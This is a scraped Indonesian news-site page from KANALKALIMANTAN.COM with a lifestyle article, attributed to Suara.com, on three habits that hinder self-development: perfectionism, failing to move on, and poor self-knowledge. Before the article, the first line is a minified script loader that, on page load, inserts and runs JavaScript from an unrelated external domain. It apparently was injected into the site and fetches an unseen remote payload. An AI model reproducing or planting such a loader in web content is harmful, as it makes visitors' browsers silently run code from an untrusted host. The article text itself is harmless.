(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Lifestyle

Sering Tak Disadari, Ternyata 3 Hal Ini Bisa Bikin Kamu Sulit Mengembangkan Diri


KANALKALIMANTAN.COM – Setiap orang tentu bercita-cita untuk terus berkembang, baik dalam hal karier ataupun pencapaian lainnya. Meski begitu, beberapa orang seringkali menemui kesulitan saat ingin mengembangkan diri. Apa penyebabnya?

Tentang permasalahan pengembangan diri ini coba diungkap oleh Founder sekaligus CEO I Am Okay Athalla Hardian. Ia membagikan 3 hal yang dapat menyebabkan seseorang sulit mengembangkan diri, dalam sebuah webinar bertajuk A Better Self Awareness to Develop Leadership Skills beberapa waktu lalu.

1. Punya sifat perfeksionisme

Permasalahan pada pengembangan diri ini terjadi ketika seseorang memiliki standar yang tinggi dan kurang realistis. Bahkan, menurut Athalla, jika standar yang tinggi ini tidak didukung oleh kondisi, itu akan membahayakan mentalnya.

“Karena kamu mem-push diri kamu untuk melakukan sesuatu. Bukan berarti tidak sempurna, tapi kita diciptakan dengan keterbatasan masing-masing,” ungkap Athalla.

“Nah, dari perfeksionisme ini, kita akan cenderung melakukan social comparison, salah satunya membandingkan diri kita dengan orang lain,” lanjutnya.

2. Gagal move on

Pengembangan diri yang gagal dibangun juga terjadi pada orang yang sulit move on. Bahkan, tanda ini terjadi ketika mereka sulit memaafkan kesalahan yang ada di masa lalu.

“Sulit memaafkan dari kesalahan di masa lalu. Dan itu bahaya banget, apalagi kalau kesalahannya sudah dari 10 tahun yang lalu masih dipikirin,” ungkap Athalla.

3. Kurang mengenal diri sendiri
Permasalahan pada pengembangan diri terjadi ketika seseorang kurang mengenali dirinya sendiri. Mulai dari kelebihan, emosi, dan apa keinginan dan tujuan dalam hidup.

“Karena kita jarang melihat pengembangan proses diri kita dan melatih diri kita, jadi ya tidak ada yang bangun. Dan tidak ada yang berubah, selain flat dan punya rasa insecure. Dan itu bahaya banget,” pungkas Athalla. (Suara.com)

Editor : Suara


Desy Arfianty

Recent Posts

“Embroidery Mini Class” Perayaan Hari Kartini di Lingkungan PLN UIP3B Kalimantan

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Kartini 2024 PT PLN (Persero) Unit Induk Penyaluran dan Pusat… Read More

9 jam ago

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

11 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

12 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

14 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

16 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

17 jam ago

This website uses cookies.